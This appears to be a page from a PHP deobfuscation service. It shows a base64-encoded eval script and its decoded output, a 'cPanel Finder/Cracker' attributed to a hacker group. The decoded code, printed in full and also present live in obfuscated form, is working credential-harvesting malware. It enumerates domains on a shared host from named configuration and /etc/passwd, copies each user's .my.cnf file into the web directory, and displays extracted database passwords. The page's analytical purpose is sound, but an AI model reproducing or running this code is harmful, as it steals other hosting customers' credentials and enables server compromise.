Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval("?>".base64_decode("Y1BhbmVsIENyYWNrZXIgfCAxMzM3IEh..

Decoded Output download

?>b'cPanel Cracker | 1337 Hunter  ---Pak Cyber Lions----  <?php /**  * @author: 1337 Hunter X  * @mail: [email protected]  * @Screenshot:   * @Last Updated: 01 June 2015 */  @ini_set(\'display_errors\',0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){     $ar0=explode($marqueurDebutLien, $text);     $ar1=explode($marqueurFinLien, $ar0[$i]);     return trim($ar1[0]); }  echo \'<html><head> <title>Automatic cPanel Finder/Cracker | Pak Cyber Lions</title> <meta content="text/html; charset=utf-8"> <meta name="keywords" content="cPanel Cracker, Pak Cyber Lions X" /> <meta name="description" content="Automatic cPanel Finder/Cracker" /> <meta name="author" content="rEd X" /> <link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif"> <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css"> <link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css"> </head><body>\'; echo \'<div style="font-family: Iceland;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF">cPanel Finder/Cracker<br /><sub>Pak Cyber Lions</sub></div><br/>\';  echo "<center>"; $d0mains = @file(\'/etc/named.conf\'); $domains = scandir("/var/named");  if ($domains or $d0mains) {     $domains = scandir("/var/named");     if($domains) { echo "<table align=\'center\'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>"; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace(\'.db\',\'\',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = \'/home/\'.$owner[\'name\'].\'/.my.cnf\'; $path = getcwd();  if (is_readable($dirz)) { copy($dirz, \'\'.$path.\'/\'.$owner[\'name\'].\'.txt\'); $p=file_get_contents(\'\'.$path.\'/\'.$owner[\'name\'].\'.txt\'); $password=entre2v2($p,\'password="\',\'"\'); echo "<tr><td>".$count++."</td><td><a href=\'http://".$domain.":2082\' target=\'_blank\'>".$domain."</a></td><td>".$owner[\'name\']."</td><td>".$password."</td><td><a href=\'".$owner[\'name\'].".txt\' target=\'_blank\'>Click Here</a></td></tr>"; $dc++; }  } } echo \'</table>\';  $total = $dc; echo \'<br><div class="result">Total cPanel Found = \'.$total.\'</h3><br />\'; echo \'</center>\'; }else{ $d0mains = @file(\'/etc/named.conf\');     if($d0mains) { echo "<table align=\'center\'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>"; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){     if(@eregi(\'zone\',$d0main)){         preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);         flush();         if(strlen(trim($domain[1][0])) >2){             $mck[] = $domain[1][0];         }     } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) {     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));     $usr[] = $infos[\'name\'];     $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file(\'/etc/passwd\'); $passwd = array(); foreach($dt as $d) {     $r = explode(\':\',$d);     if(strpos($r[5],\'home\')) {         $passwd[$r[0]] = $r[5];     } } $l=0; $j=1; foreach($usr as $r) { $dirz = \'/home/\'.$r.\'/.my.cnf\'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, \'\'.$path.\'/\'.$r.\'.txt\'); $p=file_get_contents(\'\'.$path.\'/\'.$r.\'.txt\'); $password=entre2v2($p,\'password="\',\'"\'); echo "<tr><td>".$count++."</td><td><a target=\'_blank\' href=http://".$dmn[$j-1].\'/>\'.$dmn[$j-1].\' </a></td><td>\'.$r."</td><td>".$password."</td><td><a href=\'".$r.".txt\' target=\'_blank\'>Click Here</a></td></tr>"; $dc++;                 flush();                 $l=$l?0:1;                 $j++; 				}             } 			} echo \'</table>\';  $total = $dc; echo \'<br><div class="result">Total cPanel Found = \'.$total.\'</h3><br />\'; echo \'</center>\';  } }else{ echo "<div class=\'result\'><i><font color=\'#FF0000\'>ERROR</font><br><font color=\'#FF0000\'>/var/named</font> or <font color=\'#FF0000\'>etc/named.conf</font> Not Accessible!</i></div>"; }  echo "<br>&#169; <font color=\'#FF0000\'>1337 Hunter</font> | Pak Cyber Lions"; echo "</body></html>"; ?>'

Did this file decode correctly?

Original Code

<?php 













eval("?>".base64_decode("Y1BhbmVsIENyYWNrZXIgfCAxMzM3IEh1bnRlciAgLS0tUGFrIEN5YmVyIExpb25zLS0tLSAgPD9waHAgLyoqICAqIEBhdXRob3I6IDEzMzcgSHVudGVyIFggICogQG1haWw6IHNlbmRyZXp1bHRAZ21haWwuY29tICAqIEBTY3JlZW5zaG90OiAgICogQExhc3QgVXBkYXRlZDogMDEgSnVuZSAyMDE1ICovICBAaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDApOyBmdW5jdGlvbiBlbnRyZTJ2MigkdGV4dCwkbWFycXVldXJEZWJ1dExpZW4sJG1hcnF1ZXVyRmluTGllbiwkaT0xKXsgICAgICRhcjA9ZXhwbG9kZSgkbWFycXVldXJEZWJ1dExpZW4sICR0ZXh0KTsgICAgICRhcjE9ZXhwbG9kZSgkbWFycXVldXJGaW5MaWVuLCAkYXIwWyRpXSk7ICAgICByZXR1cm4gdHJpbSgkYXIxWzBdKTsgfSAgZWNobyAnPGh0bWw+PGhlYWQ+IDx0aXRsZT5BdXRvbWF0aWMgY1BhbmVsIEZpbmRlci9DcmFja2VyIHwgUGFrIEN5YmVyIExpb25zPC90aXRsZT4gPG1ldGEgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij4gPG1ldGEgbmFtZT0ia2V5d29yZHMiIGNvbnRlbnQ9ImNQYW5lbCBDcmFja2VyLCBQYWsgQ3liZXIgTGlvbnMgWCIgLz4gPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IkF1dG9tYXRpYyBjUGFuZWwgRmluZGVyL0NyYWNrZXIiIC8+IDxtZXRhIG5hbWU9ImF1dGhvciIgY29udGVudD0ickVkIFgiIC8+IDxsaW5rIHJlbD0iU0hPUlRDVVQgSUNPTiIgaHJlZj0iaHR0cDovL3VzLnlpbWcuY29tL2kvbWVzZy9lbW90aWNvbnM3LzYxLmdpZiI+IDxsaW5rIGhyZWY9Imh0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PUljZWxhbmQiIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiPiA8bGluayByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiBocmVmPSJodHRwOi8vZmFpc2FsYWhtZWQubWUvd3AtY29udGVudC9hc3NldHMvY3NzLzEuY3NzIj4gPC9oZWFkPjxib2R5Pic7IGVjaG8gJzxkaXYgc3R5bGU9ImZvbnQtZmFtaWx5OiBJY2VsYW5kO2ZvbnQtc2l6ZTogMzVwdDt0ZXh0LXNoYWRvdzogMCAwIDZweCAjRkYwMDAwLCAwIDAgNXB4ICNGRjAwMDAsIDAgMCA1cHggI0ZGMDAwMDtjb2xvcjogI0ZGRiI+Y1BhbmVsIEZpbmRlci9DcmFja2VyPGJyIC8+PHN1Yj5QYWsgQ3liZXIgTGlvbnM8L3N1Yj48L2Rpdj48YnIvPic7ICBlY2hvICI8Y2VudGVyPiI7ICRkMG1haW5zID0gQGZpbGUoJy9ldGMvbmFtZWQuY29uZicpOyAkZG9tYWlucyA9IHNjYW5kaXIoIi92YXIvbmFtZWQiKTsgIGlmICgkZG9tYWlucyBvciAkZDBtYWlucykgeyAgICAgJGRvbWFpbnMgPSBzY2FuZGlyKCIvdmFyL25hbWVkIik7ICAgICBpZigkZG9tYWlucykgeyBlY2hvICI8dGFibGUgYWxpZ249J2NlbnRlcic+PHRyPjx0aD4gQ09VTlQgPC90aD48dGg+IERPTUFJTiA8L3RoPjx0aD4gVVNFUiA8L3RoPjx0aD4gUGFzc3dvcmQgPC90aD48dGg+IC5teS5jbmYgPC90aD48L3RyPiI7ICRjb3VudD0xOyAkZGMgPSAwOyAkbGlzdCA9IHNjYW5kaXIoIi92YXIvbmFtZWQiKTsgZm9yZWFjaCgkbGlzdCBhcyAkZG9tYWluKXsgaWYoc3RycG9zKCRkb21haW4sIi5kYiIpKXsgJGRvbWFpbiA9IHN0cl9yZXBsYWNlKCcuZGInLCcnLCRkb21haW4pOyAkb3duZXIgPSBwb3NpeF9nZXRwd3VpZChmaWxlb3duZXIoIi9ldGMvdmFsaWFzZXMvIi4kZG9tYWluKSk7ICRkaXJ6ID0gJy9ob21lLycuJG93bmVyWyduYW1lJ10uJy8ubXkuY25mJzsgJHBhdGggPSBnZXRjd2QoKTsgIGlmIChpc19yZWFkYWJsZSgkZGlyeikpIHsgY29weSgkZGlyeiwgJycuJHBhdGguJy8nLiRvd25lclsnbmFtZSddLicudHh0Jyk7ICRwPWZpbGVfZ2V0X2NvbnRlbnRzKCcnLiRwYXRoLicvJy4kb3duZXJbJ25hbWUnXS4nLnR4dCcpOyAkcGFzc3dvcmQ9ZW50cmUydjIoJHAsJ3Bhc3N3b3JkPSInLCciJyk7IGVjaG8gIjx0cj48dGQ+Ii4kY291bnQrKy4iPC90ZD48dGQ+PGEgaHJlZj0naHR0cDovLyIuJGRvbWFpbi4iOjIwODInIHRhcmdldD0nX2JsYW5rJz4iLiRkb21haW4uIjwvYT48L3RkPjx0ZD4iLiRvd25lclsnbmFtZSddLiI8L3RkPjx0ZD4iLiRwYXNzd29yZC4iPC90ZD48dGQ+PGEgaHJlZj0nIi4kb3duZXJbJ25hbWUnXS4iLnR4dCcgdGFyZ2V0PSdfYmxhbmsnPkNsaWNrIEhlcmU8L2E+PC90ZD48L3RyPiI7ICRkYysrOyB9ICB9IH0gZWNobyAnPC90YWJsZT4nOyAgJHRvdGFsID0gJGRjOyBlY2hvICc8YnI+PGRpdiBjbGFzcz0icmVzdWx0Ij5Ub3RhbCBjUGFuZWwgRm91bmQgPSAnLiR0b3RhbC4nPC9oMz48YnIgLz4nOyBlY2hvICc8L2NlbnRlcj4nOyB9ZWxzZXsgJGQwbWFpbnMgPSBAZmlsZSgnL2V0Yy9uYW1lZC5jb25mJyk7ICAgICBpZigkZDBtYWlucykgeyBlY2hvICI8dGFibGUgYWxpZ249J2NlbnRlcic+PHRyPjx0aD4gQ09VTlQgPC90aD48dGg+IERPTUFJTiA8L3RoPjx0aD4gVVNFUiA8L3RoPjx0aD4gUGFzc3dvcmQgPC90aD48dGg+IC5teS5jbmYgPC90aD48L3RyPiI7ICRjb3VudD0xOyAkZGMgPSAwOyAkbWNrID0gYXJyYXkoKTsgZm9yZWFjaCgkZDBtYWlucyBhcyAkZDBtYWluKXsgICAgIGlmKEBlcmVnaSgnem9uZScsJGQwbWFpbikpeyAgICAgICAgIHByZWdfbWF0Y2hfYWxsKCcjem9uZSAiKC4qKSIjJywkZDBtYWluLCRkb21haW4pOyAgICAgICAgIGZsdXNoKCk7ICAgICAgICAgaWYoc3RybGVuKHRyaW0oJGRvbWFpblsxXVswXSkpID4yKXsgICAgICAgICAgICAgJG1ja1tdID0gJGRvbWFpblsxXVswXTsgICAgICAgICB9ICAgICB9IH0gJG1jayA9IGFycmF5X3VuaXF1ZSgkbWNrKTsgJHVzciA9IGFycmF5KCk7ICRkbW4gPSBhcnJheSgpOyBmb3JlYWNoKCRtY2sgYXMgJG8pIHsgICAgICRpbmZvcyA9IEBwb3NpeF9nZXRwd3VpZChmaWxlb3duZXIoIi9ldGMvdmFsaWFzZXMvIi4kbykpOyAgICAgJHVzcltdID0gJGluZm9zWyduYW1lJ107ICAgICAkZG1uW10gPSAkbzsgfSBhcnJheV9tdWx0aXNvcnQoJHVzciwkZG1uKTsgJGR0ID0gZmlsZSgnL2V0Yy9wYXNzd2QnKTsgJHBhc3N3ZCA9IGFycmF5KCk7IGZvcmVhY2goJGR0IGFzICRkKSB7ICAgICAkciA9IGV4cGxvZGUoJzonLCRkKTsgICAgIGlmKHN0cnBvcygkcls1XSwnaG9tZScpKSB7ICAgICAgICAgJHBhc3N3ZFskclswXV0gPSAkcls1XTsgICAgIH0gfSAkbD0wOyAkaj0xOyBmb3JlYWNoKCR1c3IgYXMgJHIpIHsgJGRpcnogPSAnL2hvbWUvJy4kci4nLy5teS5jbmYnOyAkcGF0aCA9IGdldGN3ZCgpOyBpZiAoaXNfcmVhZGFibGUoJGRpcnopKSB7IGNvcHkoJGRpcnosICcnLiRwYXRoLicvJy4kci4nLnR4dCcpOyAkcD1maWxlX2dldF9jb250ZW50cygnJy4kcGF0aC4nLycuJHIuJy50eHQnKTsgJHBhc3N3b3JkPWVudHJlMnYyKCRwLCdwYXNzd29yZD0iJywnIicpOyBlY2hvICI8dHI+PHRkPiIuJGNvdW50KysuIjwvdGQ+PHRkPjxhIHRhcmdldD0nX2JsYW5rJyBocmVmPWh0dHA6Ly8iLiRkbW5bJGotMV0uJy8+Jy4kZG1uWyRqLTFdLicgPC9hPjwvdGQ+PHRkPicuJHIuIjwvdGQ+PHRkPiIuJHBhc3N3b3JkLiI8L3RkPjx0ZD48YSBocmVmPSciLiRyLiIudHh0JyB0YXJnZXQ9J19ibGFuayc+Q2xpY2sgSGVyZTwvYT48L3RkPjwvdHI+IjsgJGRjKys7ICAgICAgICAgICAgICAgICBmbHVzaCgpOyAgICAgICAgICAgICAgICAgJGw9JGw/MDoxOyAgICAgICAgICAgICAgICAgJGorKzsgCQkJCX0gICAgICAgICAgICAgfSAJCQl9IGVjaG8gJzwvdGFibGU+JzsgICR0b3RhbCA9ICRkYzsgZWNobyAnPGJyPjxkaXYgY2xhc3M9InJlc3VsdCI+VG90YWwgY1BhbmVsIEZvdW5kID0gJy4kdG90YWwuJzwvaDM+PGJyIC8+JzsgZWNobyAnPC9jZW50ZXI+JzsgIH0gfWVsc2V7IGVjaG8gIjxkaXYgY2xhc3M9J3Jlc3VsdCc+PGk+PGZvbnQgY29sb3I9JyNGRjAwMDAnPkVSUk9SPC9mb250Pjxicj48Zm9udCBjb2xvcj0nI0ZGMDAwMCc+L3Zhci9uYW1lZDwvZm9udD4gb3IgPGZvbnQgY29sb3I9JyNGRjAwMDAnPmV0Yy9uYW1lZC5jb25mPC9mb250PiBOb3QgQWNjZXNzaWJsZSE8L2k+PC9kaXY+IjsgfSAgZWNobyAiPGJyPiYjMTY5OyA8Zm9udCBjb2xvcj0nI0ZGMDAwMCc+MTMzNyBIdW50ZXI8L2ZvbnQ+IHwgUGFrIEN5YmVyIExpb25zIjsgZWNobyAiPC9ib2R5PjwvaHRtbD4iOyA/Pg==")); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 3cad0a0ae49cb704d7d26abac3dedab2
Eval Count 1
Decode Time 72 ms